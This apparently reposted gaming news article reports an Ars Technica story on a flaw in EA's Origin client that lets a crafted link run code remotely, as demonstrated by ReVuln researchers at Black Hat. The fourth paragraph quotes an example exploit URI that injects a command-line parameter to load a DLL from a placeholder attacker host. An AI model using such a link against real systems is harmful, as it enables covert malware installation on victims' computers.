Report: Researchers Uncover Serious Vulnerability in Origin Client

According to this Ars Technica report a serious bug in the client for EA's Origin digital distribution service could allow attackers to remotely execute malicious code on players' computers. The attack was demonstrated last week at the Black Hat security conference in Amsterdam, and it apparently only takes a few seconds to execute. Researchers from Malta-based ReVuln (@revuln) told Ars Technica that – in some cases – the hacker doesn't even have to have interaction with a victim.

In some cases, it requires no interaction by victims, researchers from Malta-based ReVuln (@revuln) told Ars. It works by manipulating the uniform resource identifiers EA's site uses to automatically start games on an end user's machine. By exploiting flaws in the Origin application available for both Macs and PCs, the technique turns EA's popular game store into an attack platform that can covertly install malware on customers' computers.

"The Origin platform allows malicious users to exploit local vulnerabilities or features by abusing the Origin URI handling mechanism," ReVuln researchers Donato Ferrante and Luigi Auriemma wrote in a paper as part of last week's demonstration. "In other words, an attacker can craft a malicious Internet link to execute malicious code remotely on [a] victim's system, which has Origin installed."

The demo shows researchers taking control of a computer with Origin installed remotely and installing Crysis 3. Ars notes that Origin uses the origin://LaunchGame/71503 link to activate a game. When a victim clicks on a URI such as origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll, the Origin client will load a Windows DLL file of the attackers' choosing on the victim's computer.

The exploit is similar to one found on Valve's Steam client uncovered back in October of 2012. Ars Technica has a whole lot more on the Origin vulnerability here. We have reached out to Electronic Arts for comment on this story and will provide an update if it responds.

Source: Ars Technica


Tweet about this on TwitterShare on FacebookShare on Google+Share on RedditEmail this to someone

Comments are closed.